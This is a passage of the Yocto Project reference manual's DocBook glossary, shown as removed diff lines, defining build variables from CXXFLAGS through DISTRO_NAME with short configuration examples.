- The minimal command and arguments used to run the C++
- compiler.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-CXXFLAGS'><glossterm>CXXFLAGS</glossterm>
- <info>
- CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C++ compiler.
- This variable is exported to an environment
- variable and thus made visible to the software being
- built during the compilation step.
- </para>
-
- <para>
- Default initialization for <filename>CXXFLAGS</filename>
- varies depending on what is being built:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-TARGET_CXXFLAGS'><filename>TARGET_CXXFLAGS</filename></link>
- when building for the target
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILD_CXXFLAGS'><filename>BUILD_CXXFLAGS</filename></link>
- when building for the build host (i.e.
- <filename>-native</filename>)
- </para></listitem>
- <listitem><para>
- <link linkend='var-BUILDSDK_CXXFLAGS'><filename>BUILDSDK_CXXFLAGS</filename></link>
- when building for an SDK (i.e.
- <filename>nativesdk-</filename>)
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-d'><title>D</title>
-
- <glossentry id='var-D'><glossterm>D</glossterm>
- <info>
- D[doc] = "The destination directory."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The destination directory.
- The location in the
- <link linkend='build-directory'>Build Directory</link>
- where components are installed by the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task.
- This location defaults to:
- <literallayout class='monospaced'>
- ${WORKDIR}/image
- </literallayout>
- <note><title>Caution</title>
- Tasks that read from or write to this directory should
- run under
- <ulink url='&YOCTO_DOCS_OM_URL;#fakeroot-and-pseudo'>fakeroot</ulink>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DATE'><glossterm>DATE</glossterm>
- <info>
- DATE[doc] = "The date the build was started using YMD format."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The date the build was started.
- Dates appear using the year, month, and day (YMD) format
- (e.g. "20150209" for February 9th, 2015).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DATETIME'><glossterm>DATETIME</glossterm>
- <info>
- DATETIME[doc] = "The date and time the build was started."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The date and time on which the current build started.
- The format is suitable for timestamps.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEBIAN_NOAUTONAME'><glossterm>DEBIAN_NOAUTONAME</glossterm>
- <info>
- DEBIAN_NOAUTONAME[doc] = "Prevents a particular package from being renamed according to Debian package naming."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When the
- <link linkend='ref-classes-debian'><filename>debian</filename></link>
- class is inherited, which is the default behavior,
- <filename>DEBIAN_NOAUTONAME</filename> specifies a
- particular package should not be renamed according to
- Debian library package naming.
- You must use the package name as an override when you
- set this variable.
- Here is an example from the <filename>fontconfig</filename>
- recipe:
- <literallayout class='monospaced'>
- DEBIAN_NOAUTONAME_fontconfig-utils = "1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEBIANNAME'><glossterm>DEBIANNAME</glossterm>
- <info>
- DEBIANNAME[doc] = "Allows you to override the library name for an individual package for Debian library package renaming."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When the
- <link linkend='ref-classes-debian'><filename>debian</filename></link>
- class is inherited, which is the default behavior,
- <filename>DEBIANNAME</filename> allows you to override the
- library name for an individual package.
- Overriding the library name in these cases is rare.
- You must use the package name as an override when you
- set this variable.
- Here is an example from the <filename>dbus</filename>
- recipe:
- <literallayout class='monospaced'>
- DEBIANNAME_${PN} = "dbus-1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEBUG_BUILD'><glossterm>DEBUG_BUILD</glossterm>
- <info>
- DEBUG_BUILD[doc] = "Specifies to build packages with debugging information. This influences the value of the SELECTED_OPTIMIZATION variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies to build packages with debugging information.
- This influences the value of the
- <filename><link linkend='var-SELECTED_OPTIMIZATION'>SELECTED_OPTIMIZATION</link></filename>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEBUG_OPTIMIZATION'><glossterm>DEBUG_OPTIMIZATION</glossterm>
- <info>
- DEBUG_OPTIMIZATION[doc] = "The options to pass in TARGET_CFLAGS and CFLAGS when compiling a system for debugging. This variable defaults to '-O -fno-omit-frame-pointer -g'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The options to pass in
- <filename><link linkend='var-TARGET_CFLAGS'>TARGET_CFLAGS</link></filename>
- and <filename><link linkend='var-CFLAGS'>CFLAGS</link></filename> when compiling
- a system for debugging.
- This variable defaults to "-O -fno-omit-frame-pointer ${DEBUG_FLAGS} -pipe".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEFAULT_PREFERENCE'><glossterm>DEFAULT_PREFERENCE</glossterm>
- <info>
- DEFAULT_PREFERENCE[doc] = "Specifies a weak bias for recipe selection priority."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a weak bias for recipe selection priority.
- </para>
-
- <para>
- The most common usage of this is variable is to set
- it to "-1" within a recipe for a development version of a
- piece of software.
- Using the variable in this way causes the stable version
- of the recipe to build by default in the absence of
- <filename><link linkend='var-PREFERRED_VERSION'>PREFERRED_VERSION</link></filename>
- being used to build the development version.
- </para>
-
- <note>
- The bias provided by <filename>DEFAULT_PREFERENCE</filename>
- is weak and is overridden by
- <filename><link linkend='var-BBFILE_PRIORITY'>BBFILE_PRIORITY</link></filename>
- if that variable is different between two layers
- that contain different versions of the same recipe.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEFAULTTUNE'><glossterm>DEFAULTTUNE</glossterm>
- <info>
- DEFAULTTUNE[doc] = "The default CPU and Application Binary Interface (ABI) tunings (i.e. the "tune") used by the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The default CPU and Application Binary Interface (ABI)
- tunings (i.e. the "tune") used by the OpenEmbedded build
- system.
- The <filename>DEFAULTTUNE</filename> helps define
- <link linkend='var-TUNE_FEATURES'><filename>TUNE_FEATURES</filename></link>.
- </para>
-
- <para>
- The default tune is either implicitly or explicitly set
- by the machine
- (<link linkend='var-MACHINE'><filename>MACHINE</filename></link>).
- However, you can override the setting using available tunes
- as defined with
- <link linkend='var-AVAILTUNES'><filename>AVAILTUNES</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPENDS'><glossterm>DEPENDS</glossterm>
- <info>
- DEPENDS[doc] = "Lists a recipe's build-time dependencies (i.e. other recipe files)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists a recipe's build-time dependencies.
- These are dependencies on other recipes whose
- contents (e.g. headers and shared libraries) are needed
- by the recipe at build time.
- </para>
-
- <para>
- As an example, consider a recipe <filename>foo</filename>
- that contains the following assignment:
- <literallayout class='monospaced'>
- DEPENDS = "bar"
- </literallayout>
- The practical effect of the previous assignment is that
- all files installed by bar will be available in the
- appropriate staging sysroot, given by the
- <link linkend='var-STAGING_DIR'><filename>STAGING_DIR*</filename></link>
- variables, by the time the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task for <filename>foo</filename> runs.
- This mechanism is implemented by having
- <filename>do_configure</filename> depend on the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task of each recipe listed in <filename>DEPENDS</filename>,
- through a
- <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>deptask</filename></ulink><filename>]</filename>
- declaration in the
- <link linkend='ref-classes-base'><filename>base</filename></link>
- class.
- <note>
- It seldom is necessary to reference, for example,
- <filename>STAGING_DIR_HOST</filename> explicitly.
- The standard classes and build-related variables are
- configured to automatically use the appropriate staging
- sysroots.
- </note>
- As another example, <filename>DEPENDS</filename> can also
- be used to add utilities that run on the build machine
- during the build.
- For example, a recipe that makes use of a code generator
- built by the recipe <filename>codegen</filename> might have
- the following:
- <literallayout class='monospaced'>
- DEPENDS = "codegen-native"
- </literallayout>
- For more information, see the
- <link linkend='ref-classes-native'><filename>native</filename></link>
- class and the
- <link linkend='var-EXTRANATIVEPATH'><filename>EXTRANATIVEPATH</filename></link>
- variable.
- <note>
- <title>Notes</title>
- <itemizedlist>
- <listitem><para>
- <filename>DEPENDS</filename> is a list of
- recipe names.
- Or, to be more precise, it is a list of
- <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
- names, which usually match recipe names.
- Putting a package name such as "foo-dev" in
- <filename>DEPENDS</filename> does not make
- sense.
- Use "foo" instead, as this will put files
- from all the packages that make up
- <filename>foo</filename>, which includes
- those from <filename>foo-dev</filename>, into
- the sysroot.
- </para></listitem>
- <listitem><para>
- One recipe having another recipe in
- <filename>DEPENDS</filename> does not by itself
- add any runtime dependencies between the
- packages produced by the two recipes.
- However, as explained in the
- "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
- section in the Yocto Project Overview and
- Concepts Manual, runtime dependencies will
- often be added automatically, meaning
- <filename>DEPENDS</filename> alone is
- sufficient for most recipes.
- </para></listitem>
- <listitem><para>
- Counterintuitively,
- <filename>DEPENDS</filename> is often necessary
- even for recipes that install precompiled
- components.
- For example, if <filename>libfoo</filename>
- is a precompiled library that links against
- <filename>libbar</filename>, then
- linking against <filename>libfoo</filename>
- requires both <filename>libfoo</filename>
- and <filename>libbar</filename> to be available
- in the sysroot.
- Without a <filename>DEPENDS</filename> from the
- recipe that installs <filename>libfoo</filename>
- to the recipe that installs
- <filename>libbar</filename>, other recipes might
- fail to link against
- <filename>libfoo</filename>.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- For information on runtime dependencies, see the
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable.
- You can also see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#tasks'>Tasks</ulink>" and
- "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
- sections in the BitBake User Manual for additional
- information on tasks and dependencies.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPLOY_DIR'><glossterm>DEPLOY_DIR</glossterm>
- <info>
- DEPLOY_DIR[doc] = "Points to the general area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the general area that the OpenEmbedded build
- system uses to place images, packages, SDKs, and other output
- files that are ready to be used outside of the build system.
- By default, this directory resides within the
- <link linkend='build-directory'>Build Directory</link>
- as <filename>${TMPDIR}/deploy</filename>.
- </para>
-
- <para>
- For more information on the structure of the Build
- Directory, see
- "<link linkend='structure-build'>The Build Directory - <filename>build/</filename></link>"
- section.
- For more detail on the contents of the
- <filename>deploy</filename> directory, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>",
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>",
- and
- "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-dev-environment'>Application Development SDK</ulink>"
- sections all in the Yocto Project Overview and Concepts
- Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPLOY_DIR_DEB'><glossterm>DEPLOY_DIR_DEB</glossterm>
- <info>
- DEPLOY_DIR_DEB[doc] = "Points to a Debian-specific area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the area that the OpenEmbedded build system uses
- to place Debian packages that are ready to be used outside
- of the build system.
- This variable applies only when
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- contains "package_deb".
- </para>
-
- <para>
- The BitBake configuration file initially defines the
- <filename>DEPLOY_DIR_DEB</filename> variable as a
- sub-folder of
- <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
- <literallayout class='monospaced'>
- DEPLOY_DIR_DEB = "${DEPLOY_DIR}/deb"
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-package_deb'><filename>package_deb</filename></link>
- class uses the
- <filename>DEPLOY_DIR_DEB</filename> variable to make sure
- the
- <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_deb</filename></link>
- task writes Debian packages into the appropriate folder.
- For more information on how packaging works, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPLOY_DIR_IMAGE'><glossterm>DEPLOY_DIR_IMAGE</glossterm>
- <info>
- DEPLOY_DIR_IMAGE[doc] = "Points to the area that the OpenEmbedded build system uses to place images and other associated output files that are ready to be deployed onto the target machine."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the area that the OpenEmbedded build system uses
- to place images and other associated output files that are
- ready to be deployed onto the target machine.
- The directory is machine-specific as it contains the
- <filename>${MACHINE}</filename> name.
- By default, this directory resides within the
- <link linkend='build-directory'>Build Directory</link>
- as <filename>${DEPLOY_DIR}/images/${MACHINE}/</filename>.
- </para>
-
- <para>
- For more information on the structure of the Build
- Directory, see
- "<link linkend='structure-build'>The Build Directory - <filename>build/</filename></link>"
- section.
- For more detail on the contents of the
- <filename>deploy</filename> directory, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
- and
- "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-dev-environment'>Application Development SDK</ulink>"
- sections both in the Yocto Project Overview and Concepts
- Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPLOY_DIR_IPK'><glossterm>DEPLOY_DIR_IPK</glossterm>
- <info>
- DEPLOY_DIR_IPK[doc] = "Points to a IPK-specific area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the area that the OpenEmbedded build system uses
- to place IPK packages that are ready to be used outside of
- the build system.
- This variable applies only when
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- contains "package_ipk".
- </para>
-
- <para>
- The BitBake configuration file initially defines this
- variable as a sub-folder of
- <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
- <literallayout class='monospaced'>
- DEPLOY_DIR_IPK = "${DEPLOY_DIR}/ipk"
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-package_ipk'><filename>package_ipk</filename></link>
- class uses the
- <filename>DEPLOY_DIR_IPK</filename> variable to make sure
- the
- <link linkend='ref-tasks-package_write_ipk'><filename>do_package_write_ipk</filename></link>
- task writes IPK packages into the appropriate folder.
- For more information on how packaging works, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPLOY_DIR_RPM'><glossterm>DEPLOY_DIR_RPM</glossterm>
- <info>
- DEPLOY_DIR_RPM[doc] = "Points to a RPM-specific area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the area that the OpenEmbedded build system uses
- to place RPM packages that are ready to be used outside
- of the build system.
- This variable applies only when
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- contains "package_rpm".
- </para>
-
- <para>
- The BitBake configuration file initially defines this
- variable as a sub-folder of
- <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
- <literallayout class='monospaced'>
- DEPLOY_DIR_RPM = "${DEPLOY_DIR}/rpm"
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-package_rpm'><filename>package_rpm</filename></link>
- class uses the
- <filename>DEPLOY_DIR_RPM</filename> variable to make sure
- the
- <link linkend='ref-tasks-package_write_rpm'><filename>do_package_write_rpm</filename></link>
- task writes RPM packages into the appropriate folder.
- For more information on how packaging works, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPLOY_DIR_TAR'><glossterm>DEPLOY_DIR_TAR</glossterm>
- <info>
- DEPLOY_DIR_TAR[doc] = "Points to a tarball area that the OpenEmbedded build system uses to place images, packages, SDKs, and other output files that are ready to be used outside of the build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Points to the area that the OpenEmbedded build system uses
- to place tarballs that are ready to be used outside of
- the build system.
- This variable applies only when
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- contains "package_tar".
- </para>
-
- <para>
- The BitBake configuration file initially defines this
- variable as a sub-folder of
- <link linkend='var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></link>:
- <literallayout class='monospaced'>
- DEPLOY_DIR_TAR = "${DEPLOY_DIR}/tar"
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-package_tar'><filename>package_tar</filename></link>
- class uses the
- <filename>DEPLOY_DIR_TAR</filename> variable to make sure
- the
- <link linkend='ref-tasks-package_write_tar'><filename>do_package_write_tar</filename></link>
- task writes TAR packages into the appropriate folder.
- For more information on how packaging works, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DEPLOYDIR'><glossterm>DEPLOYDIR</glossterm>
- <info>
- DEPLOYDIR[doc] = "For recipes that inherit the deploy class, the DEPLOYDIR points to a temporary work area for deployed files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-deploy'><filename>deploy</filename></link>
- class, the <filename>DEPLOYDIR</filename> points to a
- temporary work area for deployed files that is set in the
- <filename>deploy</filename> class as follows:
- <literallayout class='monospaced'>
- DEPLOYDIR = "${WORKDIR}/deploy-${<link linkend='var-PN'><filename>PN</filename></link>}"
- </literallayout>
- </para>
-
- <para>
- Recipes inheriting the <filename>deploy</filename> class
- should copy files to be deployed into
- <filename>DEPLOYDIR</filename>, and the class will take
- care of copying them into
- <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
- afterwards.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DESCRIPTION'><glossterm>DESCRIPTION</glossterm>
- <info>
- DESCRIPTION[doc] = "The package description used by package managers. If not set, DESCRIPTION takes the value of the SUMMARY variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The package description used by package managers.
- If not set, <filename>DESCRIPTION</filename> takes
- the value of the
- <link linkend='var-SUMMARY'><filename>SUMMARY</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO'><glossterm>DISTRO</glossterm>
- <info>
- DISTRO[doc] = "The short name of the distribution. If the variable is blank, meta/conf/distro/defaultsetup.conf will be used."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The short name of the distribution.
- For information on the long name of the distribution, see
- the
- <link linkend='var-DISTRO_NAME'><filename>DISTRO_NAME</filename></link>
- variable.
- </para>
-
- <para>
- The <filename>DISTRO</filename> variable corresponds to a
- distribution configuration file whose root name is the
- same as the variable's argument and whose filename
- extension is <filename>.conf</filename>.
- For example, the distribution configuration file for the
- Poky distribution is named <filename>poky.conf</filename>
- and resides in the
- <filename>meta-poky/conf/distro</filename> directory of
- the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
-
- <para>
- Within that <filename>poky.conf</filename> file, the
- <filename>DISTRO</filename> variable is set as follows:
- <literallayout class='monospaced'>
- DISTRO = "poky"
- </literallayout>
- </para>
-
- <para>
- Distribution configuration files are located in a
- <filename>conf/distro</filename> directory within the
- <link linkend='metadata'>Metadata</link>
- that contains the distribution configuration.
- The value for <filename>DISTRO</filename> must not contain
- spaces, and is typically all lower-case.
- <note>
- If the <filename>DISTRO</filename> variable is blank,
- a set of default configurations are used, which are
- specified within
- <filename>meta/conf/distro/defaultsetup.conf</filename>
- also in the Source Directory.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_CODENAME'><glossterm>DISTRO_CODENAME</glossterm>
- <info>
- DISTRO_CODENAME[doc] = "Specifies a codename for the distribution being built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a codename for the distribution being built.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_EXTRA_RDEPENDS'><glossterm>DISTRO_EXTRA_RDEPENDS</glossterm>
- <info>
- DISTRO_EXTRA_RDEPENDS[doc] = "Specifies a list of distro-specific packages to add to all images. The variable only applies to the images that include packagegroup-base."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of distro-specific packages to add to all images.
- This variable takes affect through
- <filename>packagegroup-base</filename> so the
- variable only really applies to the more full-featured
- images that include <filename>packagegroup-base</filename>.
- You can use this variable to keep distro policy out of
- generic images.
- As with all other distro variables, you set this variable
- in the distro <filename>.conf</filename> file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_EXTRA_RRECOMMENDS'><glossterm>DISTRO_EXTRA_RRECOMMENDS</glossterm>
- <info>
- DISTRO_EXTRA_RRECOMMENDS[doc] = "Specifies a list of distro-specific packages to add to all images if the packages exist. The list of packages are automatically installed but you can remove them."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of distro-specific packages to add to all images
- if the packages exist.
- The packages might not exist or be empty (e.g. kernel modules).
- The list of packages are automatically installed but you can
- remove them.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_FEATURES'><glossterm>DISTRO_FEATURES</glossterm>
- <info>
- DISTRO_FEATURES[doc] = "The features enabled for the distribution."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The software support you want in your distribution for
- various features.
- You define your distribution features in the distribution
- configuration file.
- </para>
-
- <para>
- In most cases, the presence or absence of a feature in
- <filename>DISTRO_FEATURES</filename> is translated to the
- appropriate option supplied to the configure script
- during the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task for recipes that optionally support the feature.
- For example, specifying "x11" in
- <filename>DISTRO_FEATURES</filename>, causes
- every piece of software built for the target that can
- optionally support X11 to have its X11 support enabled.
- </para>
-
- <para>
- Two more examples are Bluetooth and NFS support.
- For a more complete list of features that ships with the
- Yocto Project and that you can provide with this variable,
- see the
- "<link linkend='ref-features-distro'>Distro Features</link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_FEATURES_BACKFILL'><glossterm>DISTRO_FEATURES_BACKFILL</glossterm>
- <info>
- DISTRO_FEATURES_BACKFILL[doc] = "Features to be added to DISTRO_FEATURES if not also present in DISTRO_FEATURES_BACKFILL_CONSIDERED. This variable is set in the meta/conf/bitbake.conf file and it is not intended to be user-configurable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Features to be added to
- <filename><link linkend='var-DISTRO_FEATURES'>DISTRO_FEATURES</link></filename>
- if not also present in
- <filename><link linkend='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'>DISTRO_FEATURES_BACKFILL_CONSIDERED</link></filename>.
- </para>
-
- <para>
- This variable is set in the <filename>meta/conf/bitbake.conf</filename> file.
- It is not intended to be user-configurable.
- It is best to just reference the variable to see which distro features are
- being backfilled for all distro configurations.
- See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
- more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><glossterm>DISTRO_FEATURES_BACKFILL_CONSIDERED</glossterm>
- <info>
- DISTRO_FEATURES_BACKFILL_CONSIDERED[doc] = "Features from DISTRO_FEATURES_BACKFILL that should not be backfilled (i.e. added to DISTRO_FEATURES) during the build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Features from
- <filename><link linkend='var-DISTRO_FEATURES_BACKFILL'>DISTRO_FEATURES_BACKFILL</link></filename>
- that should not be backfilled (i.e. added to
- <filename><link linkend='var-DISTRO_FEATURES'>DISTRO_FEATURES</link></filename>)
- during the build.
- See the "<link linkend='ref-features-backfill'>Feature Backfilling</link>" section for
- more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_FEATURES_DEFAULT'><glossterm>DISTRO_FEATURES_DEFAULT</glossterm>
- <info>
- DISTRO_FEATURES_DEFAULT[doc] = "Provides the default list of distro features with the exception of any libc-specific features."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A convenience variable that gives you the default
- list of distro features with the exception of any
- features specific to the C library
- (<filename>libc</filename>).
- </para>
-
- <para>
- When creating a custom distribution, you might find it
- useful to be able to reuse the default
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- options without the need to write out the full set.
- Here is an example that uses
- <filename>DISTRO_FEATURES_DEFAULT</filename> from a
- custom distro configuration file:
- <literallayout class='monospaced'>
- DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} myfeature"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_FEATURES_FILTER_NATIVE'><glossterm>DISTRO_FEATURES_FILTER_NATIVE</glossterm>
- <info>
- DISTRO_FEATURES_FILTER_NATIVE[doc] = "Specifies a list of features that if present in the target DISTRO_FEATURES value should be included in DISTRO_FEATURES when building native recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of features that if present in
- the target
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- value should be included in
- <filename>DISTRO_FEATURES</filename> when building native
- recipes.
- This variable is used in addition to the features
- filtered using the
- <link linkend='var-DISTRO_FEATURES_NATIVE'><filename>DISTRO_FEATURES_NATIVE</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_FEATURES_FILTER_NATIVESDK'><glossterm>DISTRO_FEATURES_FILTER_NATIVESDK</glossterm>
- <info>
- DISTRO_FEATURES_FILTER_NATIVESDK[doc] = "Specifies a list of features that if present in the target DISTRO_FEATURES value should be included in DISTRO_FEATURES when building nativesdk recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of features that if present in the target
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- value should be included in
- <filename>DISTRO_FEATURES</filename> when building
- nativesdk recipes.
- This variable is used in addition to the features
- filtered using the
- <link linkend='var-DISTRO_FEATURES_NATIVESDK'><filename>DISTRO_FEATURES_NATIVESDK</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
-<!--
- <glossentry id='var-DISTRO_FEATURES_LIBC'><glossterm>DISTRO_FEATURES_LIBC</glossterm>
- <info>
- DISTRO_FEATURES_LIBC[doc] = "Specifies the list of distro features that are specific to the C library (libc)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A convenience variable that specifies the list of distro
- features that are specific to the C library
- (<filename>libc</filename>).
- Typically, these features are prefixed with "libc-" and
- control which features are enabled at during the build
- within the C library itself.
- </para>
- </glossdef>
- </glossentry>
--->
-
- <glossentry id='var-DISTRO_FEATURES_NATIVE'><glossterm>DISTRO_FEATURES_NATIVE</glossterm>
- <info>
- DISTRO_FEATURES_NATIVE[doc] = "Specifies a list of features that should be included in DISTRO_FEATURES when building native recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of features that should be included in
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- when building native recipes.
- This variable is used in addition to the features
- filtered using the
- <link linkend='var-DISTRO_FEATURES_FILTER_NATIVE'><filename>DISTRO_FEATURES_FILTER_NATIVE</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_FEATURES_NATIVESDK'><glossterm>DISTRO_FEATURES_NATIVESDK</glossterm>
- <info>
- DISTRO_FEATURES_NATIVESDK[doc] = "Specifies a list of features that should be included in DISTRO_FEATURES when building nativesdk recipes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of features that should be included in
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- when building nativesdk recipes.
- This variable is used in addition to the features
- filtered using the
- <link linkend='var-DISTRO_FEATURES_FILTER_NATIVESDK'><filename>DISTRO_FEATURES_FILTER_NATIVESDK</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-DISTRO_NAME'><glossterm>DISTRO_NAME</glossterm>
- <info>
- DISTRO_NAME[doc] = "The long name of the distribution."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The long name of the distribution.
- For information on the short name of the distribution, see
- the
- <link linkend='var-DISTRO'><filename>DISTRO</filename></link>
- variable.
- </para>
-
- <para>
- The <filename>DISTRO_NAME</filename> variable corresponds
- to a distribution configuration file whose root name is the
- same as the variable's argument and whose filename
- extension is <filename>.conf</filename>.
- For example, the distribution configuration file for the
- Poky distribution is named <filename>poky.conf</filename>
- and resides in the
- <filename>meta-poky/conf/distro</filename> directory of
- the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
-
- <para>
- Within that <filename>poky.conf</filename> file, the
